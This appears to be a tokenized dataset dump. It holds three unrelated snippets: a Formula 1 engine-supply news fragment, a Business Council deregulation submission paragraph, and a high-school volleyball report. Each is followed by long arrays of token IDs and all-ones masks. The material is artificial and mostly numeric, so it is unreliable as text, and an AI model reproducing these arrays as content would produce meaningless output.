has exercised his contractual veto to block the Japanese company supplying them. Toro Rosso are expected to use 2015 Ferrari engines next season.
[ 1, 9208, 4784, 373, 869, 4591, 278, 4004, 25515, 29871, 29896, 13, 13, 27418, 6478, 697, 29899, 6360, 29899, 1025, 10637, 476, 13308, 271, 29915, 29879, 9939, 8341, 338, 1473, 13, 13, 9039, 20293, 1827, 896, 674, 11551, 1009, 7156, 1196, 29899, 786, 310, 8432, 13675, 455, 6491, 322, 360, 3270, 309, 476, 13308, 271, 2446, 4259, 448, 408, 1472, 408, 278, 3815, 338, 373, 278, 6856, 29889, 13, 13, 29934, 293, 455, 6491, 756, 263, 8078, 2745, 278, 1095, 310, 29871, 29906, 29900, 29896, 29947, 541, 727, 505, 1063, 27455, 1372, 1048, 278, 5434, 310, 476, 13308, 271, 1156, 385, 701, 29899, 392, 29899, 3204, 937, 4259, 411, 278, 3815, 29889, 13, 13, 19409, 5882, 6111, 6912, 1089, 1497, 29901, 376, 29934, 293, 455, 6491, 29915, 29879, 8078, 338, 4343, 322, 599, 278, 3987, 526, 373, 1749, 2625, 411, 476, 13308, 271, 29889, 13, 13, 29928, 3270, 309, 476, 13308, 271, 29901, 25515, 29871, 29896, 29915, 29879, 3143, 281, 555, 13, 13, 29908, 3868, 29915, 29879, 2599, 2107, 29889, 1105, 1472, 408, 591, 29915, 276, 1244, 29892, 540, 29915, 645, 367, 297, 278, 1559, 2446, 1629, 1213, 13, 13, 17241, 1089, 29915, 29879, 6589, 2833, 304, 1095, 1580, 2785, 393, 4794, 29877, 5678, 578, 29915, 29879, 5918, 1798, 303, 19934, 1795, 367, 21201, 304, 278, 16336, 3815, 1156, 385, 21210, 573, 9512, 4259, 363, 278, 29871, 29896, 29947, 29899, 6360, 29899, 1025, 14872, 1171, 29889, 13, 13, 9039, 20293, 29915, 29879, 27577, 338, 1603, 297, 7404, 1363, 896, 505, 451, 3447, 16725, 3692, 896, 505, 385, 6012, 363, 29871, 29906, 29900, 29896, 29953, 29889, 13, 13, 1576, 3815, 892, 1833, 4098, 3802, 304, 378, 22368, 27214, 800, 304, 29504, 1009, 8078, 411, 7493, 1292, 263, 1629, 4688, 2861, 304, 15678, 260, 5580, 1546, 278, 1023, 29889, 13, 13, 6246, 1906, 5969, 2039, 11084, 746, 372, 3897, 2821, 4702, 28352, 723, 451, 11421, 4367, 20293, 322, 16541, 1306, 1497, 896, 1033, 451, 11421, 963, 1009, 29871, 29906, 29900, 29896, 29953, 6012, 2446, 4259, 29889, 13, 13, 797, 29879, 11376, 1827, 393, 4367, 20293, 526, 1286, 5517, 304, 6773, 411, 7493, 1292, 541, 411, 278, 6012, 2183, 263, 1422, 1024, 577, 372, 947, 451, 2615, 304, 3209, 950, 20026, 408, 565, 278, 9443, 756, 7572, 29889, 13, 13, 29934, 264, 1292, 526, 373, 278, 1147, 479, 310, 5622, 2761, 310, 278, 20815, 375, 3815, 322, 7863, 408, 263, 3815, 12271, 322, 5823, 29889, 13, 13, 17245, 29892, 6912, 1089, 7829, 727, 471, 1603, 1790, 13331, 363, 4367, 20293, 29901, 376, 8439, 1122, 367, 1554, 1683, 29889, 1334, 29915, 645, 1074, 1213, 13, 13, 9039, 20293, 505, 750, 5969, 2039, 411, 379, 14287, 1048, 263, 11421, 29892, 541, 1736, 18096, 4052, 29931, 8326, 29915, 29879, 28942, 11546, 27974, 756, 11382, 3368, 670, 8078, 950, 325, 10896, 304, 2908, 278, 10369, 5001, 1462, 5890, 963, 29889, 13, 13, 29911, 5801, 5678, 578, 526, 3806, 304, 671, 29871, 29906, 29900, 29896, 29945, 16541, 1306, 24000, 2446, 4259, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
The Business Council is strongly supportive of the government’s work to improve the efficiency and effectiveness of regulation, including the deregulation program. A critical enabler of efficient regulatory outcomes is a proper process that carefully considers the impact of new regulatory proposals, and continually assesses the effectiveness of regulation that is already on the books. This submission focuses on the whole-of-government processes underpinning deregulation and regulation impact assessment. We suggest these processes have greatly improved regulatory outcomes but need to be strengthened, to avoid eroding the benefits of deregulation.
[ 1, 450, 15197, 8831, 338, 13818, 2304, 573, 310, 278, 5874, 30010, 29879, 664, 304, 11157, 278, 19201, 322, 2779, 20193, 310, 1072, 2785, 29892, 3704, 278, 589, 387, 2785, 1824, 29889, 13, 13, 29909, 12187, 427, 370, 1358, 310, 8543, 24378, 7606, 714, 26807, 338, 263, 1571, 1889, 393, 16112, 1136, 11376, 278, 10879, 310, 716, 24378, 7606, 9551, 1338, 29892, 322, 2145, 1474, 1223, 15322, 278, 2779, 20193, 310, 1072, 2785, 393, 338, 2307, 373, 278, 8277, 29889, 13, 13, 4013, 29240, 8569, 267, 373, 278, 3353, 29899, 974, 29899, 29887, 6170, 358, 10174, 1090, 12687, 1076, 589, 387, 2785, 322, 1072, 2785, 10879, 24809, 358, 29889, 1334, 4368, 1438, 10174, 505, 11180, 16710, 24378, 7606, 714, 26807, 541, 817, 304, 367, 9324, 6419, 29892, 304, 4772, 604, 3689, 278, 23633, 310, 589, 387, 2785, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Volleyball team appears to be turning corner Wednesday The DeSales High School girls volleyball team appears to have turned the corner in a rebuilding process five years in the making. The DeSales High School girls volleyball team appears to have turned the corner in a rebuilding process five years in the making. Since reaching a Division II state semifinal in 2004, the Stallions have had some solid seasons, including district final appearances in 2006 and 2008, but they haven't been on that same level. They may not be considered that kind of team this year, but in coach Kelly Morgan's second season, DeSales has reason to believe they are returning to past form. After winning 10 of their first 11 matches the Stallions appear to have new life. "We have a lot of strong players this year and a lot of good coaching," said senior Kristina Hoying, a three-year varsity player. "A lot of the team chemistry this year is a lot better than in the past. We've definitely pushed through (rough times) and pulled out ahead." Hoying would know a lot about from where the Stallions have come. They were 12-12 her sophomore year in 2008 before losing to Hartley in a district final. The season was considered a success and a big improvement from the 5-21 season the year before. Since finishing 23-5 in 2004, the Stallions have hovered around .500. They finished 13-11 in 2005 and 14-11 in 2006. After Erin Scott resigned following the 2008 season, Morgan became DeSales' third coach in four years and led the team to a 13-12 record. There were signs last year that the team was headed in the right direction. Hartley, which has been a state semifinalist for the past three seasons, needed five games to beat the Stallions 25-12, 28-30, 23-25, 25-16, 15-12 in a district semifinal last year. The Stallions finished third in the CCL at 4-6 a year ago. They haven't placed better than that since winning the league in 2004. They're looking to break that trend this year after beating Watterson 14-25, 21-25, 26-24, 28-26, 15-12 on Sept. 16. That was DeSales' first win over the Eagles since 2004. "As coaches, it was amazing (to end the drought against Watterson)," Morgan said. "We were thinking what we were going to do to kill them in practice (after going down two games to none). They came back and in games four and five, to see the excitement on their faces and on the faces of the parents in the stands, to watch that emotion was priceless." DeSales parlayed that momentum into a first-place finish at the Granville Tournament two days later. There, the Stallions beat Caledonia River Valley 23-25, 25-16, 25-22 and Northridge 25-19, 25-14 before taking care of New Albany 25-18, 25-19 in the final. What makes the team more optimistic about the future is its youth. The Stallions have just two seniors on the roster as well as six juniors, six sophomores and two freshmen. "A lot of (the team's success is that) the upperclassmen really stepped up and have been really encouraging to our underclassmen," junior setter Kelly Linsenmayer said. "It's been a lot of hard work and working together." Last Monday - Finished second (172) behind Westerville North (167) and ahead of Westerville South (173) and Watterson (181) Last Tuesday - Competed in Division II sectional tournament at Granville Golf Course. The top three teams and top three individuals not on a qualifying team advanced to the district tournament on Tuesday at Cumberland Trail. GIRLS GOLF Sept. 20 - Lost to Gahanna 160-171 Sept. 23 - Lost to New Albany 179-193 Last Saturday - Watterson Tournament was canceled Tuesday - Division II sectional tournament at Foxfire. The top three teams and top three individuals not on a qualifying team advance to the district tournament on Oct. 12 at Bent Tree. BOYS SOCCER *Sept. 21 - Tied Hartley at 0. A.J. Tresoline had eight saves. Sept. 23 - Lost to Hilliard Bradley 3-2 *Last Tuesday - Played Watterson Today - Home vs. Upper Arlington. The teams played to a scoreless tie last year. *Tuesday - Home vs. St. Charles. The Stallions won 1-0 last year. Of note: The Stallions were 3-4-3 overall and 1-0-1 in the CCL before last Tuesday. Original content available for non-commercial use under a Creative Commons license, except where noted. ThisWeek Community News ~ 5300 Crosswind Drive, Columbus, OH 43228 ~ Privacy Policy ~ Terms Of Service
[ 1, 3684, 2330, 2135, 3815, 5692, 304, 367, 14712, 11155, 13, 13, 29956, 287, 4515, 3250, 13, 13, 1576, 897, 29903, 2122, 5057, 4523, 14000, 1700, 2330, 2135, 3815, 5692, 304, 505, 6077, 278, 11155, 297, 263, 337, 25237, 1889, 5320, 2440, 297, 278, 3907, 29889, 13, 13, 1576, 897, 29903, 2122, 5057, 4523, 14000, 1700, 2330, 2135, 3815, 5692, 304, 505, 6077, 278, 11155, 297, 263, 337, 25237, 1889, 5320, 2440, 297, 278, 3907, 29889, 13, 13, 23036, 20888, 263, 7946, 1944, 2106, 27632, 979, 297, 29871, 29906, 29900, 29900, 29946, 29892, 278, 624, 497, 1080, 505, 750, 777, 7773, 20084, 29892, 3704, 6474, 2186, 21712, 297, 29871, 29906, 29900, 29900, 29953, 322, 29871, 29906, 29900, 29900, 29947, 29892, 541, 896, 7359, 29915, 29873, 1063, 373, 393, 1021, 3233, 29889, 13, 13, 15597, 1122, 451, 367, 5545, 393, 2924, 310, 3815, 445, 1629, 29892, 541, 297, 11182, 21872, 20549, 29915, 29879, 1473, 4259, 29892, 897, 29903, 2122, 756, 2769, 304, 4658, 896, 526, 7863, 304, 4940, 883, 29889, 2860, 15613, 29871, 29896, 29900, 310, 1009, 937, 29871, 29896, 29896, 7087, 278, 624, 497, 1080, 2615, 304, 505, 716, 2834, 29889, 13, 13, 29908, 4806, 505, 263, 3287, 310, 4549, 10769, 445, 1629, 322, 263, 3287, 310, 1781, 1302, 9733, 1699, 1497, 16336, 17773, 1099, 8335, 5414, 29892, 263, 2211, 29899, 6360, 24987, 537, 4847, 29889, 376, 29909, 3287, 310, 278, 3815, 8950, 6020, 445, 1629, 338, 263, 3287, 2253, 1135, 297, 278, 4940, 29889, 1334, 29915, 345, 11630, 18760, 1549, 313, 10573, 3064, 29897, 322, 20043, 714, 14432, 1213, 13, 13, 29950, 29877, 5414, 723, 1073, 263, 3287, 1048, 515, 988, 278, 624, 497, 1080, 505, 2041, 29889, 2688, 892, 29871, 29896, 29906, 29899, 29896, 29906, 902, 269, 3021, 290, 487, 1629, 297, 29871, 29906, 29900, 29900, 29947, 1434, 19035, 304, 12321, 2330, 297, 263, 6474, 2186, 29889, 450, 4259, 471, 5545, 263, 2551, 322, 263, 4802, 20414, 515, 278, 29871, 29945, 29899, 29906, 29896, 4259, 278, 1629, 1434, 29889, 13, 13, 23036, 28321, 29871, 29906, 29941, 29899, 29945, 297, 29871, 29906, 29900, 29900, 29946, 29892, 278, 624, 497, 1080, 505, 16758, 287, 2820, 869, 29945, 29900, 29900, 29889, 2688, 7743, 29871, 29896, 29941, 29899, 29896, 29896, 297, 29871, 29906, 29900, 29900, 29945, 322, 29871, 29896, 29946, 29899, 29896, 29896, 297, 29871, 29906, 29900, 29900, 29953, 29889, 13, 13, 13555, 1425, 262, 8075, 620, 12961, 1494, 278, 29871, 29906, 29900, 29900, 29947, 4259, 29892, 20549, 3897, 897, 29903, 2122, 29915, 4654, 11182, 297, 3023, 2440, 322, 5331, 278, 3815, 304, 263, 29871, 29896, 29941, 29899, 29896, 29906, 2407, 29889, 13, 13, 8439, 892, 18906, 1833, 1629, 393, 278, 3815, 471, 2343, 287, 297, 278, 1492, 5305, 29889, 12321, 2330, 29892, 607, 756, 1063, 263, 2106, 27632, 979, 391, 363, 278, 4940, 2211, 20084, 29892, 4312, 5320, 8090, 304, 16646, 278, 624, 497, 1080, 29871, 29906, 29945, 29899, 29896, 29906, 29892, 29871, 29906, 29947, 29899, 29941, 29900, 29892, 29871, 29906, 29941, 29899, 29906, 29945, 29892, 29871, 29906, 29945, 29899, 29896, 29953, 29892, 29871, 29896, 29945, 29899, 29896, 29906, 297, 263, 6474, 27632, 979, 1833, 1629, 29889, 13, 13, 1576, 624, 497, 1080, 7743, 4654, 297, 278, 315, 6154, 472, 29871, 29946, 29899, 29953, 263, 1629, 8020, 29889, 2688, 7359, 29915, 29873, 7180, 2253, 1135, 393, 1951, 15613, 278, 13225, 297, 29871, 29906, 29900, 29900, 29946, 29889, 13, 13, 15597, 29915, 276, 3063, 304, 2867, 393, 534, 355, 445, 1629, 1156, 367, 1218, 399, 2620, 1100, 29871, 29896, 29946, 29899, 29906, 29945, 29892, 29871, 29906, 29896, 29899, 29906, 29945, 29892, 29871, 29906, 29953, 29899, 29906, 29946, 29892, 29871, 29906, 29947, 29899, 29906, 29953, 29892, 29871, 29896, 29945, 29899, 29896, 29906, 373, 28742, 29889, 29871, 29896, 29953, 29889, 2193, 471, 897, 29903, 2122, 29915, 937, 5401, 975, 278, 382, 351, 793, 1951, 29871, 29906, 29900, 29900, 29946, 29889, 13, 13, 29908, 2887, 11182, 267, 29892, 372, 471, 21863, 292, 313, 517, 1095, 278, 4192, 1774, 2750, 399, 2620, 1100, 511, 29908, 20549, 1497, 29889, 376, 4806, 892, 7291, 825, 591, 892, 2675, 304, 437, 304, 12088, 963, 297, 6944, 313, 7045, 2675, 1623, 1023, 8090, 304, 5642, 467, 2688, 2996, 1250, 322, 297, 8090, 3023, 322, 5320, 29892, 304, 1074, 278, 29163, 373, 1009, 17240, 322, 373, 278, 17240, 310, 278, 11825, 297, 278, 15028, 29892, 304, 6505, 393, 953, 8194, 471, 544, 293, 6393, 1213, 13, 13, 2772, 29903, 2122, 610, 8387, 287, 393, 19399, 964, 263, 937, 29899, 6689, 8341, 472, 278, 6274, 4909, 29427, 1023, 3841, 2678, 29889, 1670, 29892, 278, 624, 497, 1080, 16646, 315, 7943, 6405, 6163, 13939, 29871, 29906, 29941, 29899, 29906, 29945, 29892, 29871, 29906, 29945, 29899, 29896, 29953, 29892, 29871, 29906, 29945, 29899, 29906, 29906, 322, 4644, 8605, 29871, 29906, 29945, 29899, 29896, 29929, 29892, 29871, 29906, 29945, 29899, 29896, 29946, 1434, 5622, 2562, 310, 1570, 16197, 1384, 29871, 29906, 29945, 29899, 29896, 29947, 29892, 29871, 29906, 29945, 29899, 29896, 29929, 297, 278, 2186, 29889, 13, 13, 5618, 3732, 278, 3815, 901, 5994, 4695, 1048, 278, 5434, 338, 967, 12397, 29889, 450, 624, 497, 1080, 505, 925, 1023, 6940, 18930, 373, 278, 696, 2475, 408, 1532, 408, 4832, 17340, 943, 29892, 4832, 269, 3021, 290, 2361, 322, 1023, 10849, 1527, 29889, 13, 13, 29908, 29909, 3287, 310, 313, 1552, 3815, 29915, 29879, 2551, 338, 393, 29897, 278, 7568, 1990, 1527, 2289, 28996, 701, 322, 505, 1063, 2289, 18443, 292, 304, 1749, 1090, 1990, 1527, 1699, 20183, 731, 357, 21872, 365, 28219, 29885, 2747, 1497, 29889, 376, 3112, 29915, 29879, 1063, 263, 3287, 310, 2898, 664, 322, 1985, 4208, 1213, 13, 13, 8897, 27822, 448, 4231, 3276, 1473, 313, 29896, 29955, 29906, 29897, 5742, 3122, 261, 4909, 4644, 313, 29896, 29953, 29955, 29897, 322, 14432, 310, 3122, 261, 4909, 4275, 313, 29896, 29955, 29941, 29897, 322, 399, 2620, 1100, 313, 29896, 29947, 29896, 29897, 13, 13, 8897, 323, 1041, 3250, 448, 24620, 287, 297, 7946, 1944, 4004, 284, 14743, 472, 6274, 4909, 402, 4369, 6325, 344, 29889, 450, 2246, 2211, 10907, 322, 2246, 2211, 15724, 451, 373, 263, 4021, 9215, 3815, 12862, 304, 278, 6474, 14743, 373, 323, 1041, 3250, 472, 315, 2807, 1049, 3201, 309, 29889, 13, 13, 29954, 29902, 2241, 29903, 402, 5607, 29943, 13, 13, 2008, 415, 29889, 29871, 29906, 29900, 448, 25133, 304, 402, 801, 9713, 29871, 29896, 29953, 29900, 29899, 29896, 29955, 29896, 13, 13, 2008, 415, 29889, 29871, 29906, 29941, 448, 25133, 304, 1570, 16197, 1384, 29871, 29896, 29955, 29929, 29899, 29896, 29929, 29941, 13, 13, 8897, 24211, 448, 399, 2620, 1100, 29427, 471, 508, 346, 839, 13, 13, 29911, 1041, 3250, 448, 7946, 1944, 4004, 284, 14743, 472, 14802, 8696, 29889, 450, 2246, 2211, 10907, 322, 2246, 2211, 15724, 451, 373, 263, 4021, 9215, 3815, 6564, 304, 278, 6474, 14743, 373, 4756, 29889, 29871, 29896, 29906, 472, 27079, 15472, 29889, 13, 13, 8456, 21554, 7791, 4174, 1001, 13, 13, 29930, 2008, 415, 29889, 29871, 29906, 29896, 448, 323, 1000, 12321, 2330, 472, 29871, 29900, 29889, 319, 29889, 29967, 29889, 323, 9778, 457, 750, 9475, 27401, 29889, 13, 13, 2008, 415, 29889, 29871, 29906, 29941, 448, 25133, 304, 9143, 29875, 538, 15862, 2330, 29871, 29941, 29899, 29906, 13, 13, 29930, 8897, 323, 1041, 3250, 448, 7412, 287, 399, 2620, 1100, 13, 13, 29911, 397, 388, 448, 8778, 7186, 29889, 24929, 826, 1847, 880, 29889, 450, 10907, 5318, 304, 263, 885, 272, 6393, 22134, 1833, 1629, 29889, 13, 13, 29930, 29911, 1041, 3250, 448, 8778, 7186, 29889, 624, 29889, 5322, 29889, 450, 624, 497, 1080, 2113, 29871, 29896, 29899, 29900, 1833, 1629, 29889, 13, 13, 2776, 4443, 29901, 450, 624, 497, 1080, 892, 29871, 29941, 29899, 29946, 29899, 29941, 12463, 322, 29871, 29896, 29899, 29900, 29899, 29896, 297, 278, 315, 6154, 1434, 1833, 323, 1041, 3250, 29889, 13, 13, 26036, 2793, 3625, 363, 1661, 29899, 510, 1050, 1455, 671, 1090, 263, 26635, 3468, 19405, 29892, 5174, 988, 11682, 29889, 13, 4013, 22606, 19184, 10130, 3695, 29871, 29945, 29941, 29900, 29900, 11189, 14800, 22850, 29892, 11990, 375, 29892, 438, 29950, 29871, 29946, 29941, 29906, 29906, 29947, 3695, 18936, 4135, 25219, 3695, 11814, 29879, 4587, 6692 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
